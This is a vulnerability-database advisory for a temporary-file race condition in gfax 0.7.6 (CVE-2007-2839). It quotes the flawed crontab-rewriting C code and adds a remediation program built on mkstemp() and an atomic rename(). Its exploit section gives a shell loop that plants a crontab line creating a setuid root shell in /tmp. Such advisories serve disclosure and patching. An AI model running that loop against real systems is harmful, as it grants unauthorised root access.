gfax insecure temporary file local privilege escalation vulnerability

Vulnerability ID: 1113252    Vulnerability type: race condition
Published: 2007-07-05    Updated: 2007-07-06
CVE: CVE-2007-2839    CNNVD ID: CNNVD-200707-090
Platform: Linux    CVSS score: 7.2
|Source
https://www.exploit-db.com/exploits/30280
https://www.securityfocus.com/bid/24780
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-090
|Details
gfax is a GNOME front end for network fax software. gfax handles a temporary file unsafely, and a local attacker could exploit this to elevate privileges. The delete_crontab_entry() function in gfax's src/mgett_setup.c handles the temporary file in an insecure manner:

    /* if it's NULL then nuke the faxrunq crontab entry. */
    if ((fin = fopen("/etc/crontab", "r")) == NULL) {
        do_message(_("\nCan't open /etc/crontab\n"));
        return;
    }
    if ((fout = fopen("/tmp/crontab", "w")) == NULL) {
        do_message(_("\nCan't create /tmp/crontab\n"));
        return;
    }
    while (fgets(buf, 128, fin) != NULL) {
        fputs(buf, fout);
    }
    fclose(fout);
    fclose(fin);

    /* now copy the new file back to /etc */
    if ((fin = fopen("/tmp/crontab", "r")) == NULL) {
        do_message(_("\nCan't open /tmp/crontab\n"));
        return;
    }
    if ((fout = fopen("/etc/crontab", "w")) == NULL) {
        do_message(_("\nCan't create /etc/crontab\n"));
        return;
    }
    while ((c = fgetc(fin)) != EOF)
        fputc(c, fout);
    fclose(fout);
    fclose(fin);
    remove("/tmp/crontab");

This can result in arbitrary commands being written into /etc/crontab. If /tmp/crontab already exists and is owned by a non-root user, it is truncated and later removed, but its owner remains that non-root user. A race condition therefore exists between the first copy (to /tmp/crontab) and the second copy (back to /etc/crontab), allowing arbitrary lines to be appended to /etc/crontab.
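The root cause is a fixed, predictable scratch path in a world-writable directory that is written, closed, and then reopened, leaving a window in which another user controls the file's contents. The following C program is an added example and is not gfax's code; the function names, the `faxrunq` marker string and the sample crontab lines are constructed for illustration. It shows the remediation a maintainer would apply: filter the file in memory, write the result to a mkstemp() file created in the target's own directory (not /tmp), and rename() it over the target so the replacement is atomic and never involves a path another user could pre-create.

```c
/* Added example: race-free replacement for a "copy via /tmp" crontab rewrite. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Copy `in` to `out`, dropping every line that contains `needle`.
 * Returns the number of lines dropped, or -1 if `out` is too small. */
int drop_lines_containing(const char *in, const char *needle,
                          char *out, size_t outsz)
{
    int dropped = 0;
    size_t used = 0, nlen = strlen(needle);
    while (*in) {
        const char *nl = strchr(in, '\n');
        size_t linelen = nl ? (size_t)(nl - in) + 1 : strlen(in);
        int hit = 0;                       /* search only within this line */
        for (size_t i = 0; nlen && i + nlen <= linelen; i++)
            if (memcmp(in + i, needle, nlen) == 0) { hit = 1; break; }
        if (hit) {
            dropped++;
        } else {
            if (used + linelen >= outsz) return -1;
            memcpy(out + used, in, linelen);
            used += linelen;
        }
        in += linelen;
    }
    out[used] = '\0';
    return dropped;
}

/* Atomically replace `target` with `content`. The scratch file is created by
 * mkstemp() (O_CREAT|O_EXCL, mode 0600) in the target's own directory, so an
 * unprivileged user can neither pre-create it nor swap it between the write
 * and the install; rename() then publishes the new file in a single step. */
int replace_file_atomically(const char *target, const char *content, mode_t mode)
{
    char tmpl[4096];
    const char *slash = strrchr(target, '/');
    size_t dirlen = slash ? (size_t)(slash - target + 1) : 0;
    if (dirlen + sizeof(".crontab.XXXXXX") > sizeof tmpl) { errno = ENAMETOOLONG; return -1; }
    memcpy(tmpl, target, dirlen);
    strcpy(tmpl + dirlen, ".crontab.XXXXXX");

    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    size_t len = strlen(content), off = 0;
    while (off < len) {
        ssize_t n = write(fd, content + off, len - off);
        if (n < 0) { if (errno == EINTR) continue; goto fail; }
        off += (size_t)n;
    }
    if (fchmod(fd, mode) < 0 || fsync(fd) < 0) goto fail;
    if (close(fd) < 0) { fd = -1; goto fail; }
    if (rename(tmpl, target) < 0) { fd = -1; goto fail; }
    return 0;
fail:
    if (fd >= 0) close(fd);
    unlink(tmpl);
    return -1;
}

/* Read `path` into `buf` (NUL-terminated). Returns bytes read or -1. */
static long read_whole_file(const char *path, char *buf, size_t bufsz)
{
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, bufsz - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (long)n;
}

/* Race-free counterpart of delete_crontab_entry(): filter in memory, then
 * install atomically. Returns the number of lines removed, or -1 on error. */
int delete_crontab_entry_safe(const char *crontab_path, const char *needle)
{
    char old[8192], updated[8192];
    if (read_whole_file(crontab_path, old, sizeof old) < 0) return -1;
    int dropped = drop_lines_containing(old, needle, updated, sizeof updated);
    if (dropped < 0) return -1;
    return replace_file_atomically(crontab_path, updated, 0644) < 0 ? -1 : dropped;
}

/* Self-check on a constructed crontab inside a private mkdtemp() directory.
 * Returns 1 if the faxrunq line is gone and the other lines survived. */
int demo(void)
{
    char dir[] = "/tmp/crontab-demo.XXXXXX";     /* constructed scratch dir */
    if (!mkdtemp(dir)) return 0;
    char path[4200], after[8192];
    snprintf(path, sizeof path, "%s/crontab", dir);
    const char *sample =                           /* constructed sample crontab */
        "SHELL=/bin/sh\n"
        "17 * * * *  root  run-parts /etc/cron.hourly\n"
        "*/5 * * * * root  /usr/bin/faxrunq\n";
    int ok = replace_file_atomically(path, sample, 0644) == 0 &&
             delete_crontab_entry_safe(path, "faxrunq") == 1 &&
             read_whole_file(path, after, sizeof after) >= 0 &&
             strstr(after, "faxrunq") == NULL &&
             strstr(after, "cron.hourly") != NULL;
    unlink(path);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("%s\n", demo() ? "ok" : "FAILED");
    return 0;
}
```

Two properties carry the fix: the scratch file is never at a name another user can choose (mkstemp picks it with O_EXCL in a directory only root can write to), and there is no second read of a closed temporary file, so the window the advisory describes does not exist.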
|Exploit
source: http://www.securityfocus.com/bid/24780/info

GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers.

GFAX 0.7.6 is vulnerable; other versions may also be affected.

while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done
|Affected products
GFAX GFAX 0.7.6; Debian Linux 3.1
|References

Source: DEBIAN    Name: DSA-1329    Link: http://www.debian.org/security/2007/dsa-1329
Source: OSVDB    Name: 37883    Link: http://osvdb.org/37883
Source: XF    Name: gfax-deletecrontab-command-execution(35403)    Link: http://xforce.iss.net/xforce/xfdb/35403
Source: SECTRACK    Name: 1018335    Link: http://www.securitytracker.com/id?1018335
Source: BID    Name: 24780    Link: http://www.securityfocus.com/bid/24780
Source: SECUNIA    Name: 25967    Link: http://secunia.com/advisories/25967
Source: SECUNIA    Name: 25937    Link: http://secunia.com/advisories/25937